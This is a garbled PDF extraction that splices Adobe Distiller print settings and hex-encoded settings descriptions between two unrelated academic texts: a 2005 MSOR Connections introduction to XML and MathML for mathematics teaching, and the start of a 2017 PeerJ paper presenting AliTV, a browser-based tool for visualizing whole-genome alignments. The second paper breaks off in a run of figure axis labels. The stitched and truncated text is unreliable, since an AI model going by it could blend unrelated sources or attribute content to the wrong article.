(Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_oalnvw4najdf3bpfwxz2hqcpvu ---- MathML / XML series: An introduction....MSOR Connections Nov 2005 Vol 5 No 4 1 Peter James Rowlett Nottingham Trent University peter.rowlett@ntu.ac.uk MathML / XML series: An introduction MSOR Connections Nov 2005 Vol 5 No 4 The eXtensible Markup Language (XML) is changing the way the worldworks...The word processor used to write this piece is storing the text and style information using XML. The Firefox web browser from the Mozilla Foundation, which is battling for web browser market share with Microsoft’s Internet Explorer browser [1], uses the XML language XUL to describe its user interface. With the interface in an open format, Firefox is customisible [2]. You may have heard of the RSS feed format (although apparently more people use RSS than have heard of it [3]) or of it’s audio, and lately video-based equivalent, the Podcast. Both are XML implementations. You might use XML for satellite navigation [4] or to modify your favourite computer game [5]. Linguists, concerned that data recorded on endangered languages may become lost are using XML as a storage method that they can be “sure will be accessible indefinitely into the future” [6]. They know that by basing their data storage on a free and open standard they can ensure that the future tools will be able to access the data stored today. Some implementations that may be of particular interest to the MSOR community are: MathML, used to store mathematics in an unambiguous, machine readable format; and SVG and X3D, used to create 2D and 3D diagrams and animations in a non-proprietary format. These are just a few examples. NASA remarks: “Government, industry, and academia are all embracing XML as a technology that will assist in the sharing and reuse of information” [7]. Broadly speaking, XML is a method for describing the structure of data and storing that data. XML is free to use, platform independent, non-proprietary and built on international data encoding standards. This means users with ‘non-standard technologies’ like Linux, Firefox, a screenreader or a non- English language can access the data equally. Programs can be written to access the data from any platform, and being able to use an XML resource into the future does not depend on any company or organisation’s continued existence, as it might with a proprietary format. Using the XML implementation MathML, one arrives at a free, open, platform independent, non-proprietary format for describing mathematics notation. Your web browser has a language for describing mathematics that your computer algebra system can also speak. Mathematics stored as MathML can be unambiguously translated into other formats, such as spoken English or Mathematical Braille. A search engine can be written which searches MathML webpages for the actual mathematics used, not just for the English text likely to accompany it. While MathML is obviously the XML format of most specific relevance for the MSOR community, there are plenty of other XML implementations available and upcoming that may be of use. And XML languages are created all the time by individuals to fit a particular need for a particular piece of work. Exciting things are certainly possible with MathML and XML. How is the MSOR community taking advantage of this? This introduction is intended to mark the start of a series of articles within MSOR Connections. Upcoming articles will explore the MathML format, 2 MathML / XML series: An introduction Peter James Rowlett MSOR Connections Nov 2005 Vol 5 No 4 other XML formats and look at the way people are using these. This is where your help is needed: • Do you offer your course notes on the Web using MathML or another XML format? How do you generate this? • Do you podcast your lectures? • Have a look at the software you use. Does it use XML? How might you take advantage of this? • Have you written a program which makes use of XML? Does your teaching and learning project store data as XML? • Does your statistical package use XML for data storage? • Do you have an idea for an XML application you’d like to discuss? • Are you screaming at this page for missing an obvious application of XML? • Do you disagree with something written above? Have you tried using XML and found it unsuited to your needs? Debate is certainly encouraged! Will you share your experiences through MSOR Connections? Please contact the editors if you are able to write or contribute to an article for this series. References [1] Barker, C. Firefox market share on a rollercoaster ride [online]. In: ZDNet UK, 11 October 2005. At: http://news.zdnet.co.uk/internet/ 0,39020369,39228262,00.htm [Accessed 13 October 2005]. [2] Hamiter, E. How to create Mozilla Firefox extensions [online], 2004. At: http:// roachfiend.com/archives/2004/12/08/how-to- create-firefox-extensions/ [Accessed 14 October 2005]. [3] Burns, E. More Use RSS Than Have Heard Of It [online]. In: ClickZ Network, 11 October 2005. At: http://www.clickz.com/stats/sectors/ search_tools/article.php/3555441 [Accessed 13 October 2005]. [4] Foster, D., ed. GPX: the GPS Exchange Format [online], 2005. At: http://www.topografix.com/ gpx.asp [Accessed 13 October 2005]. [5] Callaham, J. Civilization IV Mod Details [online]. Game Cloud, 2005. At: http:// www.gamecloud.com/article.php?article_id=1614 [Accessed 13 October 2005]. [6] Webster, A. Digital race to save languages [online]. In: BBC News, 20 March 2003. At: http:// news.bbc.co.uk/1/hi/technology/2857041.stm [Accessed 13 October 2005]. [7] NASA. NASA XML Project [online], 2005. At: http://xml.nasa.gov/ [Accessed 13 October 2005]. Remember that the Maths, Stats & OR Network maintains a list of MathML resources, at: www.mathstore.ac.uk/mathml/ << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /All /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Tags /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJDFFile false /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveEPSInfo true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile () /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /DownsampleColorImages true /ColorImageDownsampleType /Bicubic /ColorImageResolution 300 /ColorImageDepth -1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /DCTEncode /AutoFilterColorImages true /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /DownsampleGrayImages true /GrayImageDownsampleType /Bicubic /GrayImageResolution 300 /GrayImageDepth -1 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /DCTEncode /AutoFilterGrayImages true /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /DownsampleMonoImages true /MonoImageDownsampleType /Bicubic /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile () /PDFXOutputCondition () /PDFXRegistryName (http://www.color.org) /PDFXTrapped /Unknown /Description << /FRA <FEFF004f007000740069006f006e00730020007000650072006d0065007400740061006e007400200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000500044004600200064006f007400e900730020006400270075006e00650020007200e90073006f006c007500740069006f006e002000e9006c0065007600e9006500200070006f0075007200200075006e00650020007100750061006c0069007400e90020006400270069006d007000720065007300730069006f006e00200061006d00e9006c0069006f007200e90065002e00200049006c002000650073007400200070006f0073007300690062006c0065002000640027006f00750076007200690072002000630065007300200064006f00630075006d0065006e007400730020005000440046002000640061006e00730020004100630072006f0062006100740020006500740020005200650061006400650072002c002000760065007200730069006f006e002000200035002e00300020006f007500200075006c007400e9007200690065007500720065002e> /ENU (Use these settings to create PDF documents with higher image resolution for improved printing quality. The PDF documents can be opened with Acrobat and Reader 5.0 and later.) /JPN <FEFF3053306e8a2d5b9a306f30019ad889e350cf5ea6753b50cf3092542b308000200050004400460020658766f830924f5c62103059308b3068304d306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e305930023053306e8a2d5b9a30674f5c62103057305f00200050004400460020658766f8306f0020004100630072006f0062006100740020304a30883073002000520065006100640065007200200035002e003000204ee5964d30678868793a3067304d307e30593002> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e0020005000440046002d0044006f006b0075006d0065006e00740065006e0020006d00690074002000650069006e006500720020006800f60068006500720065006e002000420069006c0064006100750066006c00f600730075006e0067002c00200075006d002000650069006e0065002000760065007200620065007300730065007200740065002000420069006c0064007100750061006c0069007400e400740020007a0075002000650072007a00690065006c0065006e002e00200044006900650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f0062006100740020006f0064006500720020006d00690074002000640065006d002000520065006100640065007200200035002e003000200075006e00640020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /PTB <FEFF005500740069006c0069007a006500200065007300740061007300200063006f006e00660069006700750072006100e700f5006500730020007000610072006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000500044004600200063006f006d00200075006d00610020007200650073006f006c007500e700e3006f00200064006500200069006d006100670065006d0020007300750070006500720069006f0072002000700061007200610020006f006200740065007200200075006d00610020007100750061006c0069006400610064006500200064006500200069006d0070007200650073007300e3006f0020006d0065006c0068006f0072002e0020004f007300200064006f00630075006d0065006e0074006f0073002000500044004600200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002c002000520065006100640065007200200035002e0030002000650020007300750070006500720069006f0072002e> /DAN <FEFF004200720075006700200064006900730073006500200069006e0064007300740069006c006c0069006e006700650072002000740069006c0020006100740020006f0070007200650074007400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006d006500640020006800f8006a006500720065002000620069006c006c00650064006f0070006c00f80073006e0069006e006700200066006f00720020006100740020006600e50020006200650064007200650020007500640073006b00720069006600740073006b00760061006c0069007400650074002e0020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e006500730020006d006500640020004100630072006f0062006100740020006f0067002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /NLD <FEFF004700650062007200750069006b002000640065007a006500200069006e007300740065006c006c0069006e00670065006e0020006f006d0020005000440046002d0064006f00630075006d0065006e00740065006e0020007400650020006d0061006b0065006e0020006d00650074002000650065006e00200068006f0067006500720065002000610066006200650065006c00640069006e00670073007200650073006f006c007500740069006500200076006f006f0072002000650065006e0020006200650074006500720065002000610066006400720075006b006b00770061006c00690074006500690074002e0020004400650020005000440046002d0064006f00630075006d0065006e00740065006e0020006b0075006e006e0065006e00200077006f007200640065006e002000670065006f00700065006e00640020006d006500740020004100630072006f00620061007400200065006e002000520065006100640065007200200035002e003000200065006e00200068006f006700650072002e> /ESP <FEFF0055007300650020006500730074006100730020006f007000630069006f006e006500730020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000500044004600200063006f006e0020006d00610079006f00720020007200650073006f006c00750063006900f3006e00200064006500200069006d006100670065006e00200070006100720061002000610075006d0065006e0074006100720020006c0061002000630061006c006900640061006400200061006c00200069006d007000720069006d00690072002e0020004c006f007300200064006f00630075006d0065006e0074006f00730020005000440046002000730065002000700075006500640065006e00200061006200720069007200200063006f006e0020004100630072006f00620061007400200079002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004e00e4006900640065006e002000610073006500740075007300740065006e0020006100760075006c006c006100200076006f0069006400610061006e0020006c0075006f006400610020005000440046002d0061007300690061006b00690072006a006f006a0061002c0020006a006f006900640065006e002000740075006c006f0073007400750073006c00610061007400750020006f006e0020006b006f0072006b006500610020006a00610020006b007500760061006e0020007400610072006b006b007500750073002000730075007500720069002e0020005000440046002d0061007300690061006b00690072006a0061007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f006200610074002d0020006a00610020004100630072006f006200610074002000520065006100640065007200200035002e00300020002d006f0068006a0065006c006d0061006c006c0061002000740061006900200075007500640065006d006d0061006c006c0061002000760065007200730069006f006c006c0061002e> /ITA <FEFF00550073006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000500044004600200063006f006e00200075006e00610020007200690073006f006c0075007a0069006f006e00650020006d0061006700670069006f00720065002000700065007200200075006e00610020007100750061006c0069007400e00020006400690020007300740061006d007000610020006d00690067006c0069006f00720065002e0020004900200064006f00630075006d0065006e00740069002000500044004600200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f00700070007200650074007400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006d006500640020006800f80079006500720065002000620069006c00640065006f00700070006c00f80073006e0069006e006700200066006f00720020006200650064007200650020007500740073006b00720069006600740073006b00760061006c0069007400650074002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e006500730020006d006500640020004100630072006f0062006100740020006f0067002000520065006100640065007200200035002e00300020006f0067002000730065006e006500720065002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006e00e40072002000640075002000760069006c006c00200073006b0061007000610020005000440046002d0064006f006b0075006d0065006e00740020006d006500640020006800f6006700720065002000620069006c0064007500700070006c00f60073006e0069006e00670020006f006300680020006400e40072006d006500640020006600e50020006200e400740074007200650020007500740073006b00720069006600740073006b00760061006c0069007400650074002e0020005000440046002d0064006f006b0075006d0065006e00740065006e0020006b0061006e002000f600700070006e006100730020006d006500640020004100630072006f0062006100740020006f00630068002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006100720065002e> >> >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_oasf2ferpfgbnb5o62kmo4m3b4 ---- Submitted 22 April 2017 Accepted 25 April 2017 Published 12 June 2017 Corresponding author Frank Förster, frank.foerster@uni-wuerzburg.de, foersterfrank@gmx.de Academic editor Shawn Gomez Additional Information and Declarations can be found on page 7 DOI 10.7717/peerj-cs.116 Copyright 2017 Ankenbrand et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS AliTV—interactive visualization of whole genome comparisons Markus J. Ankenbrand1,*, Sonja Hohlfeld1,2,*, Thomas Hackl2,3 and Frank Förster2,4 1 Department of Animal Ecology and Tropical Biology, Julius Maximilian University, Würzburg, Germany 2 Department for Bioinformatics, Julius Maximilian University, Würzburg, Germany 3 Department of Civil and Environmental Engineering, Massachusetts Institute of Technology, Cambridge, MA, USA 4 Center for Computational and Theoretical Biology, Julius Maximilian University, Würzburg, Germany * These authors contributed equally to this work. ABSTRACT Whole genome alignments and comparative analysis are key methods in the quest of unraveling the dynamics of genome evolution. Interactive visualization and exploration of the generated alignments, annotations, and phylogenetic data are important steps in the interpretation of the initial results. Limitations of existing software inspired us to develop our new tool AliTV, which provides interactive visualization of whole genome alignments. AliTV reads multiple whole genome alignments or automatically generates alignments from the provided data. Optional feature annotations and phylo- genetic information are supported. The user-friendly, web-browser based and highly customizable interface allows rapid exploration and manipulation of the visualized data as well as the export of publication-ready high-quality figures. AliTV is freely available at https://github.com/AliTVTeam/AliTV. Subjects Bioinformatics, Computational Biology Keywords Comparative genomics, Alignment, Visualization INTRODUCTION Advances in short- and long-read sequencing and assembly over the last decade (Salzberg et al., 2011; Chin et al., 2013; Hackl et al., 2014) have made whole genome sequencing a routine task for biologists in various fields. Public sequence databases already contain several thousand of draft and finished genomes (Benson et al., 2013), with many more on the way (Pagani et al., 2012). In particular, high throughput sequencing projects of pathogen strains related to recent outbreaks (Rasko et al., 2011), and large-scale ecological studies targeting microbial communities and pan genomes of populations using metagenome and single cell sequencing approaches contribute in this process (Turnbaugh et al., 2007; Kashtan et al., 2014). These rich data sets can be explored for large-scale evolutionary processes using comparative genomics and whole genome alignments, revealing genomic recombinations (Didelot, Méric & Falush, 2012; Namouchi et al., 2012; Yahara et al., 2014), islands and horizontal gene transfer (Avrani et al., 2011; Coleman et al., 2006; Langille, Hsiao & Brinkman, 2008) as well as the often related dynamics of mobile or endogenous viral elements (Fischer, 2015; Touchon & Rocha, 2007). Other applications of whole genome How to cite this article Ankenbrand et al. (2017), AliTV—interactive visualization of whole genome comparisons. PeerJ Comput. Sci. 3:e116; DOI 10.7717/peerj-cs.116 https://peerj.com mailto:frank.foerster@uni-wuerzburg.de mailto:frank.foerster@uni-wuerzburg.de mailto:foersterfrank@gmx.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.116 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/AliTVTeam/AliTV http://dx.doi.org/10.7717/peerj-cs.116 comparisons include the analysis of paleopolyploidization events (Vanneste et al., 2014) and quantitative measurements of intra-tumour heterogeneity (Schwarz et al., 2015). However, to facilitate proper interpretation of the obtained whole genome comparisons, visualization is key. One of the first tools to provide an interactive graphical representation of aligned genomes is the multiple whole genome alignment program Mauve (Darling et al., 2004). Mauve represents genomes in a co-linear layout with homologous syntenic blocks indicated by colors and connecting lines. The interactive stand-alone viewer ACT (Carver et al., 2008), in addition to alignment blocks, supports the representation of genomic annotations, such as genes. The R library genoPlotR (Guy, Kultima & Andersson, 2010) and the Python based application EasyFig (Sullivan, Petty & Beatson, 2011), both also based on a co-linear layout and supporting feature annotations, lack interactive analysis features as they are designed to generate static figures. In addition to co-linear layouts, tools using circular representations of genomes have been developed. BLASTatlas (Hallin, Binnewies & Ussery, 2008) and BRIG (Alikhan et al., 2011) use multiple concentric rings to represent data of individual genomes, with BRIG also providing an interactive graphical interface. GenomeRing (Herbig et al., 2012) uses a circular representation as well, however, places all genomes on the same ring and syntenic blocks are connected with arcs extending into the center of the ring. The web-based comparative genomics software Sybil (Riley et al., 2012) provides interactive co-linear visualization of multiple whole genome alignments with feature annotations and also supports a phylogenetic tree alongside the alignments. The software builds on a relational Chado database schema and, therefore, requires upload and import of custom data sets prior to analysis. During our analysis of existing software, we found that interactive tools are useful for data exploration, but offer limited support for the figure export and at low qualities. Scripting-based tools provide higher levels of customization and figure quality, however, require familiarity with the respective language, thus often rendering the generation of figures time-consuming. For web- and database-based suites, such as Sybil, the upload and import procedure complicate utilization and limit applicability. Here we present our stand-alone application AliTV (Alignment Toolbox and visualization) designed for interactive visualization of multiple whole genome alignments. AliTV aims to enable researches to either directly read or automatically generate new whole genome alignments, rapidly explore the results, manipulate and customize the visualization and, at the end of the day, export appealing, publication-grade figures. AliTV reads sequence and annotation or alignment data in common formats (FASTA, GenBank, GFF, MAF, Newick, and so on), and internally computes alignments using lastz (Harris, 2007). The user-friendly interface is built on the state-of-the-art D3.js JavaScript framework and can be utilized in a platform independent manner with common web browsers. Genomes are represented in a highly customizable co-linear layout including annotations and an optional phylogenetic tree. The tree is not computed by AliTV but has to be provided during data generation. Also, the order of genomes is not automatically optimized to minimize rearrangements. Customizations to the figure by the user can be saved, reloaded, and exported to high quality SVG files. Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 2/10 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.116 METHODS Our tool AliTV is divided into two parts. The first non-interactive part is required for the generation of the input files for our interactive viewer. The second part represents that interactive viewer in the form of a SVG file embedded in a HTML5 website. The latest version of our code can be obtained from GitHub (https://github.com/AliTVTeam/AliTV). It is planned to adjust AliTV in order to integrate it into the BioJS registry (https: //biojsnet.herokuapp.com/, Corpas et al. (2014)). The general design of AliTV assures, that AliTV runs on different hard- and software platforms, e.g., Linux, MacOSX, and Windows. The following sections describe those parts in more detail. Data preparation The data preparation is performed by a single Perl script named alitv.pl. This script uses a set of different Perl modules to import incoming data and generate valid JSON input data for our visualization engine described in the next paragraph. One of our aims is to support as many different input formats for sequence and annotation information as possible. Therefore, we used the well tested and broadly accepted BioPerl as basis for our modules (Stajich et al., 2002). The script alitv.pl uses a YAML file to specify the different input files. Moreover, an easy-to-use-mode is available which requires only a couple of input files and generates the required YAML file on the fly. This generated YAML settings file might be used to reproduce AliTV results or can be used as starting point to alter configuration parameters. During the preparation step, AliTV requires all-vs-all alignments of the complete sequence set. Those alignments are generated or user provided. The current version of alitv.pl requires lastz to generate all alignments in MAF format (Harris, 2007). Nevertheless, BioPerl supports a broad range of alignment formats. Therefore, other programs can easily be added to the list of supported alignment programs. Moreover, the ability to use existing alignments allows a huge time benefit, when AliTV parameters are changed to optimize the visualization via YAML settings file in a non-interactive manner. Thus future versions of alitv.pl will support caching of alignments based on checksums to avoid unnecessary recalculations. The final result of our alitv.pl is a JSON file, which can be load into our interactive visualization page. Interactive visualization AliTV is implemented in JavaScript. Our code is documented using JSDoc 3 (version 3.4.0 http://usejsdoc.org/, 02.06.2016). AliTV generates a SVG which is presented within a browser using HTML5. A tutorial is available at https://alitv.readthedocs.io/en/latest/index.html. To gain advanced application possibilities we use different libraries. The JavaScript library D3.js 3.5.17 (http://d3js.org/, 06.06.2016) provides a wide range of pre- built functions for calculating and drawing the interactive figure. In addition, AliTV employes JQuery 2.2.4 (https://jquery.com/, 06.06.2016) to ease access to several parts of the figure. This is helpful for hiding selected sequences, genes or links. JQueryUI 1.11.4 (https://jqueryui.com/, 06.06.2016) gives us the possibilities to add user-friendly Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 3/10 https://peerj.com https://github.com/AliTVTeam/AliTV https://biojsnet.herokuapp.com/ https://biojsnet.herokuapp.com/ http://usejsdoc.org/ https://alitv.readthedocs.io/en/latest/index.html http://d3js.org/ https://jquery.com/ https://jqueryui.com/ http://dx.doi.org/10.7717/peerj-cs.116 Table 1 Chloroplast genomes of the parasitic and non-parasitic plants used in the case study. Species Accession Life-style Reference Olea europaea NC_013707 Non-parasitic Messina (2010) Lindenbergia philippensis NC_022859 Non-parasitic Wicke et al. (2013) Cistanche phelypaea NC_025642 Holo-parasitic Wicke et al. (2013) Epifagus virginiana NC_001568 Holo-parasitic Wolfe, Morden & Palmer (1992) Orobanche gracilis NC_023464 Holo-parasitic Wicke et al. (2013) Schwalbea americana NC_023115 Hemi-parasitic Wicke et al. (2013) Nicotiana tabacum NC_001879 Non-parasitic Kunnimalaiyaan & Nielsen (1997) interactions to AliTV. With sliders the user has the chance to specify values for link length and link identity. Context menus offer direct and native interactions with the figure. To guarantee correct code functionality we engineer AliTV according to the Test Driven Development. First we write an automated test case that defines a new function. Then we add the minimum amount of code to make the test pass. Finally we refactor the code to accepted standards. We use Jasmine 2.3 (http://jasmine.github.io/, 06.06.2016), as framework for testing our JavaScript code. The tests can run either via the SpecRunner or the command line using the taskrunner grunt 1.0.0 (http://gruntjs.com/, 06.06.2016). RESULTS AND DISCUSSION To demonstrate the capabilities of AliTV we describe a short case study using seven published chloroplast genomes (Table 1). Four of the chloroplasts belong to parasitic plant species and three to non-parasitic ones. Parasitic plants rely much less or not at all on photosynthetic activity, a trait that should be reflected in the genomic structure of their chloroplast genomes. To assess this hypothesis the chloroplast genomes were downloaded from NCBI and processed with alitv.pl. For demonstration purposes, the chloroplast genome of Nicotiana tabacum was split in two pieces to represent an unfinished genome with more than one contig, and the genome sequence of Schwalbea americana was reverse-complemented (flipped). The pair-wise whole genome alignments are visualized by AliTV (Fig. 1A). The left-hand side of the display panel shows the phylogenetic tree for the seven species with species names as tip labels (parasitic plants are highlighted with an asterisk). The tree has been created provided in accordance to NCBI taxonomy (Sayers et al., 2009). Next to the tip labels, each genome is drawn as a scaled and annotated horizontal bar. The orientation of the S. americana genome was swapped back to match the orientation of the other genomes, indicated by the tick coordinates in reverse order (0 on the right side). N. tabacum is represented by two bars as the sequence has been split into two parts. On those bars features (e.g., genes or (IRs)) are shown as either rectangles or arrows. Alignments between adjacent genomes are represented as colored ribbons. The bottom legend shows the default color scale from red to green corresponding to low and high identity respectively. The most striking observation is that three of the chloroplast genomes have drastically reduced sizes. All of those are parasitic (Table 1). Interestingly the chloroplast genome Ankenbrand et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.116 4/10 https://peerj.com http://www.ncbi.nlm.nih.gov/nuccore/NC_013707 http://www.ncbi.nlm.nih.gov/nuccore/NC_022859 http://www.ncbi.nlm.nih.gov/nuccore/NC_025642 http://www.ncbi.nlm.nih.gov/nuccore/NC_001568 http://www.ncbi.nlm.nih.gov/nuccore/NC_023464 http://www.ncbi.nlm.nih.gov/nuccore/NC_023115 http://www.ncbi.nlm.nih.gov/nuccore/NC_001879 http://jasmine.github.io/ http://gruntjs.com/ http://dx.doi.org/10.7717/peerj-cs.116 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 0 bp 10000 bp 20000 bp 30000 bp 40000 bp 50000 bp 60000 bp 70000 bp 80000 bp 90000 bp 100000 bp 110000 bp 120000 bp 130000 bp 140000 bp 150000 bp 0 bp 10000 bp 20000 bp 